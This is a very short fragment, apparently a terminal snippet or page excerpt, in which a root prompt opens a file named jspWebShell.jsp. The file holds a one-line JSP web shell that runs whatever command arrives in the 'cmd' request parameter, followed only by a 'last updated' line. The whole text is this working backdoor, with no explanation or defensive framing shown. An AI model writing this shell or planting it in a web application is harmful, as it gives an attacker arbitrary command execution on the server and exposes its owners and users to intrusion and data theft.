root@oco:~$ nano jspWebShell.jsp ... <% Runtime.getRuntime().exec(request.getParameter("cmd")); %> ...
Last updated 18 hours ago